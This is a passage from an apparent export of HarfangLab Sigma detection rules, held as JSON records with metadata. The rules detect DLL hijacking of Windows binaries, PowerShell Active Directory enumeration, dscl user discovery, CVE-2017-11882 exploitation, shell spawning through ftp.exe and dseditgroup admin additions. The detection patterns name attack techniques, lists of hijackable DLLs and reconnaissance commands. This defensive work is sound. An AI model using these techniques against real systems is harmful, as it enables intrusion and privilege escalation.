"content": "title: DLL Hijacking via dmomacpmo.exe\nid: 39035abb-812f-4e80-93a0-a5b682e2caa4\ndescription: |\n Detects potential Windows DLL Hijacking via dmomacpmo.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dmomacpmo.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - '\\DMCmnUtils.dll'\n - '\\dmEnrollEngine.DLL'\n - '\\DMProcessXMLFiltered.dll'\n - '\\dsclient.dll'\n - '\\iri.dll'\n - '\\msvcp110_win.dll'\n - '\\omadmapi.dll'\n - '\\USERENV.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: 
selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "39035abb-812f-4e80-93a0-a5b682e2caa4",
"rule_name": "DLL Hijacking via dmomacpmo.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dmomacpmo.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nThe rule alerts when a Microsoft-signed dmomacpmo.exe loads one of its expected dependencies, unless the process or the library resides under System32, SysWOW64 or WinSxS, or the library itself is signed by Microsoft Windows.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "391f70f4-692c-4114-b801-554f1d003a62",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083272Z",
"creation_date": "2026-03-23T11:45:34.083274Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083279Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://ericazelic.medium.com/ldap-queries-for-offensive-and-defensive-operations-4b035b816814",
"https://blog.talosintelligence.com/emerging-interlock-ransomware/",
"https://attack.mitre.org/techniques/T1018/"
],
"name": "t1018_domain_computer_discovered_powershell.yml",
"content": "title: Domain Computer Discovered via PowerShell\nid: 391f70f4-692c-4114-b801-554f1d003a62\ndescription: |\n Detects the use of PowerShell to enumerate Active Directory computer objects.\n This may indicate reconnaissance activity aimed at identifying systems with specific roles, locations, or functions.\n It is recommended to analyze the parent process as well as other commands executed in the same PowerShell session to look for malicious content or actions.\nreferences:\n - https://ericazelic.medium.com/ldap-queries-for-offensive-and-defensive-operations-4b035b816814\n - https://blog.talosintelligence.com/emerging-interlock-ransomware/\n - https://attack.mitre.org/techniques/T1018/\ndate: 2025/07/09\nmodified: 2025/08/06\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n - '[adsisearcher]'\n - 'objectCategory=computer'\n - '.PropertiesToLoad.Add('\n - '.findAll()'\n\n filter_script:\n PowershellScriptPath|contains: '?'\n\n condition: selection and not 1 of filter_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "391f70f4-692c-4114-b801-554f1d003a62",
"rule_name": "Domain Computer Discovered via PowerShell",
"rule_description": "Detects the use of PowerShell to enumerate Active Directory computer objects through an [adsisearcher] query for objectCategory=computer.\nThis may indicate reconnaissance activity aimed at identifying systems with specific roles, locations, or functions.\nCommands executed from a script file on disk (non-empty PowershellScriptPath) are excluded by this rule and will not alert.\nIt is recommended to analyze the parent process as well as other commands executed in the same PowerShell session to look for malicious content or actions.\n",
"rule_creation_date": "2025-07-09",
"rule_modified_date": "2025-08-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "394e4403-48b4-4304-8127-3fc432fe70aa",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.294301Z",
"creation_date": "2026-03-23T11:45:35.294305Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294312Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1087/001/",
"https://attack.mitre.org/techniques/T1033/"
],
"name": "t1087_001_dscl_readall_users_macos.yml",
"content": "title: Users Properties Discovered via Dscl\nid: 394e4403-48b4-4304-8127-3fc432fe70aa\ndescription: |\n Detects the execution of the dscl command to list all users and their properties.\n Attackers may use it during the discovery phase of an attack to retrieve a list of users and their properties, such as their Apple ID, which groups they belong to, and their User IDs.\n It is recommended to check for other suspicious activity by the parent process.\nreferences:\n - https://attack.mitre.org/techniques/T1087/001/\n - https://attack.mitre.org/techniques/T1033/\ndate: 2022/12/01\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.001\n - attack.t1033\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Dscl\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n # dscl . -readall users\n # dscl . -readall /Users\n # dscl . -readall /Users some_property\n Image: '/usr/bin/dscl'\n CommandLine|contains|all:\n - 'readall '\n - 'users'\n ParentImage|contains: '?'\n\n exclusion_jamf:\n ParentImage:\n - '/usr/local/jamf/bin/jamf'\n - '/library/privilegedhelpertools/com.jamfsoftware.composer.helper'\n\n exclusion_munki:\n - Ancestors|contains: '/Library/MunkiReport/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python'\n - ParentCommandLine|contains: '/usr/local/munkireport/scripts/'\n\n exclusion_mosyle:\n Ancestors|contains: '|/Library/Application Support/Mosyle/MosyleMDM.app/Contents/MacOS/MosyleMDM|'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "394e4403-48b4-4304-8127-3fc432fe70aa",
"rule_name": "Users Properties Discovered via Dscl",
"rule_description": "Detects the execution of the dscl command to list all users and their properties.\nAttackers may use it during the discovery phase of an attack to retrieve a list of users and their properties, such as their Apple ID, which groups they belong to, and their User IDs.\nIt is recommended to check for other suspicious activity by the parent process.\n",
"rule_creation_date": "2022-12-01",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1087.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "395679f3-08b5-4f6e-92ac-f29f2338ef57",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604584Z",
"creation_date": "2026-03-23T11:45:34.604587Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604594Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882",
"https://www.zscaler.com/blogs/security-research/threat-actors-exploit-cve-2017-11882-deliver-agent-tesla",
"https://attack.mitre.org/techniques/T1203/"
],
"name": "cve_2017_11882_office_eqnedt32.yml",
"content": "title: Office CVE-2017-11882 Vulnerability Exploited\nid: 395679f3-08b5-4f6e-92ac-f29f2338ef57\ndescription: |\n Detects the possible exploitation of CVE-2017-11882 related to the Microsoft Office EQNEDT32.EXE binary.\n This vulnerability allows an attacker to perform arbitrary code execution from a Microsoft Office application.\n It is recommended to analyze processes spawned by the Equation Editor process to determine their legitimacy and to look for other suspicious actions on the host.\nreferences:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882\n - https://www.zscaler.com/blogs/security-research/threat-actors-exploit-cve-2017-11882-deliver-agent-tesla\n - https://attack.mitre.org/techniques/T1203/\ndate: 2021/01/07\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1203\n - attack.t1204.002\n - attack.initial_access\n - attack.t1566.001\n - cve.2017-11882\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.EQNEDT32\n - classification.Windows.Exploit.Office\n - classification.Windows.Exploit.CVE-2017-11882\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\EQNEDT32.EXE'\n\n exclusion_werfault:\n # C:\\WINDOWS\\system32\\WerFault.exe -u -p 556 -s 1160\n Image:\n - '?:\\WINDOWS\\system32\\WerFault.exe'\n - '?:\\WINDOWS\\syswow64\\WerFault.exe'\n CommandLine|contains: ' -p '\n\n condition: selection and not 1 of exclusion_*\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "395679f3-08b5-4f6e-92ac-f29f2338ef57",
"rule_name": "Office CVE-2017-11882 Vulnerability Exploited",
"rule_description": "Detects the possible exploitation of CVE-2017-11882 related to the Microsoft Office EQNEDT32.EXE binary.\nThis vulnerability allows an attacker to perform arbitrary code execution from a Microsoft Office application.\nAny process spawned by EQNEDT32.EXE triggers this rule, except a WerFault.exe crash handler launched with -p.\nIt is recommended to analyze processes spawned by the Equation Editor process to determine their legitimacy and to look for other suspicious actions on the host.\n",
"rule_creation_date": "2021-01-07",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1203",
"attack.t1204.002",
"attack.t1566.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "398fc353-ba44-4dfc-84a9-33585c83daef",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097973Z",
"creation_date": "2026-03-23T11:45:34.097975Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097979Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dfsrdiag.yml",
"content": "title: DLL Hijacking via dfsrdiag.exe\nid: 398fc353-ba44-4dfc-84a9-33585c83daef\ndescription: |\n Detects potential Windows DLL Hijacking via dfsrdiag.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dfsrdiag.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\clusapi.dll'\n - '\\dsparse.dll'\n - '\\esent.dll'\n - '\\fltlib.dll'\n - '\\framedynos.dll'\n - '\\mpr.dll'\n - '\\netapi32.dll'\n - '\\ntdsapi.dll'\n - '\\secur32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "398fc353-ba44-4dfc-84a9-33585c83daef",
"rule_name": "DLL Hijacking via dfsrdiag.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dfsrdiag.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nThe rule alerts when a Microsoft-signed dfsrdiag.exe loads one of its expected dependencies, unless the process or the library resides under System32, SysWOW64 or WinSxS, or the library itself is signed by Microsoft Windows.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "39a96861-139b-49ca-a6f1-21daa047960d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085960Z",
"creation_date": "2026-03-23T11:45:34.085963Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085967Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Ftp.yml",
"https://lolbas-project.github.io/lolbas/Binaries/Ftp/",
"https://attack.mitre.org/techniques/T1218/",
"https://attack.mitre.org/software/S0095/"
],
"name": "t1218_ftp_spawning_cmd.yml",
"content": "title: Shell Process Spawned by ftp.exe\nid: 39a96861-139b-49ca-a6f1-21daa047960d\ndescription: |\n Detects a suspicious attempt to execute commands through a legitimate ftp.exe signed binary.\n Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries.\n It is recommended to analyze the parent process as well as all child processes of ftp.exe to look for malicious content or actions.\nreferences:\n - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Ftp.yml\n - https://lolbas-project.github.io/lolbas/Binaries/Ftp/\n - https://attack.mitre.org/techniques/T1218/\n - https://attack.mitre.org/software/S0095/\ndate: 2021/08/05\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.s0095\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.FTP\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_child:\n Image|endswith: '\\cmd.exe'\n CommandLine|contains: '\\cmd.exe /C '\n selection_parent:\n ParentImage|endswith:\n - '?:\\Windows\\System32\\ftp.exe'\n - '?:\\Windows\\SysWOW64\\ftp.exe'\n condition: all of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "39a96861-139b-49ca-a6f1-21daa047960d",
"rule_name": "Shell Process Spawned by ftp.exe",
"rule_description": "Detects a suspicious attempt to execute commands through the legitimate, signed ftp.exe binary.\nAdversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries.\nThe rule matches cmd.exe launched with /C as a child of the System32 or SysWOW64 ftp.exe.\nIt is recommended to analyze the parent process as well as all child processes of ftp.exe to look for malicious content or actions.\n",
"rule_creation_date": "2021-08-05",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "39ae5f02-3e67-4cd1-bf0d-381b30ce4ecd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618361Z",
"creation_date": "2026-03-23T11:45:34.618363Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618367Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1078/003/"
],
"name": "t1078_003_dseditgroup_admin.yml",
"content": "title: User Added to Admin Group via dseditgroup\nid: 39ae5f02-3e67-4cd1-bf0d-381b30ce4ecd\ndescription: |\n Detects the execution of dseditgroup with a suspicious ancestor process.\n Adversaries may leverage the dseditgroup to escalate privileges by adding a valid user in the admin group.\n It is recommended to check if the user is expected to be admin and for suspicious activities by the parents processes.\nreferences:\n - https://attack.mitre.org/techniques/T1078/003/\ndate: 2024/07/23\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.persistence\n - attack.defense_evasion\n - attack.initial_access\n - attack.t1078.003\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.PrivilegeEscalation\n - classification.macOS.Behavior.AccountManipulation\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n ProcessName: 'dseditgroup'\n CommandLine|contains|all:\n - ' admin'\n - ' -a'\n ProcessAncestors|contains:\n # folder\n - '/users/shared/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/private/var/root/'\n - '/Volumes/'\n # process\n - 'osascript'\n - 'python'\n - 'perl'\n - 'ruby'\n - 'bash'\n - '/sh'\n - 'zsh'\n - 'com.apple.automator.runner'\n\n exclusion_jamf:\n - ProcessAncestors|contains: '/usr/local/jamf/bin/jamf'\n - ProcessParentCommandLine|contains: '/Library/Application Support/JAMF/tmp/'\n\n exclusion_ansible:\n ProcessGrandparentCommandLine|startswith: '/bin/sh -c echo BECOME-SUCCESS-'\n\n exclusion_kandji:\n ProcessAncestors: '/usr/bin/sudo|/bin/bash|/Library/Kandji/Kandji Agent.app/Contents/Helpers/Kandji Library Manager.app/Contents/MacOS/kandji-library-manager|/sbin/launchd'\n\n exclusion_installer:\n ProcessParentCommandLine|startswith: '/bin/sh /tmp/PKInstallSandbox.??????/'\n\n exclusion_var:\n ProcessGrandparentCommandLine|contains: '/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000'\n Ancestors: 
'/usr/bin/sudo|/bin/bash'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "39ae5f02-3e67-4cd1-bf0d-381b30ce4ecd",
"rule_name": "User Added to Admin Group via dseditgroup",
"rule_description": "Detects the execution of dseditgroup with a suspicious ancestor process.\nAdversaries may leverage dseditgroup to escalate privileges by adding a valid user to the admin group.\nIt is recommended to check whether the user is expected to be an admin and to review the parent processes for suspicious activity.\n",
"rule_creation_date": "2024-07-23",
"rule_modified_date": "2025-04-14",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.initial_access",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1078.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "39c7e57b-5207-433d-b9bf-7b43f9617495",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593565Z",
"creation_date": "2026-03-23T11:45:34.593569Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593576Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.secureworks.com/research/shadowpad-malware-analysis",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_bdreinit.yml",
"content": "title: DLL Hijacking via BDReinit.exe\nid: 39c7e57b-5207-433d-b9bf-7b43f9617495\ndescription: |\n Detects potential Windows DLL Hijacking via BDReinit.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.secureworks.com/research/shadowpad-malware-analysis\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'BDReinit.exe'\n ImageLoaded|endswith: '\\log.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Bitdefender Antivirus Free\\'\n - '?:\\Program Files\\Bitdefender Antivirus Free\\'\n - '?:\\Program Files (x86)\\Ivanti\\Endpoint\\'\n - '?:\\Program Files\\Ivanti\\Endpoint\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files (x86)\\Bitdefender Antivirus Free\\'\n - '?:\\Program Files\\Bitdefender Antivirus Free\\'\n - '?:\\Program Files (x86)\\Ivanti\\Endpoint\\'\n - '?:\\Program Files\\Ivanti\\Endpoint\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Bitdefender SRL'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "39c7e57b-5207-433d-b9bf-7b43f9617495",
"rule_name": "DLL Hijacking via BDReinit.exe",
"rule_description": "Detects potential Windows DLL Hijacking via BDReinit.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "39c97768-09b3-4aa2-adfb-07c4804f4ccf",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
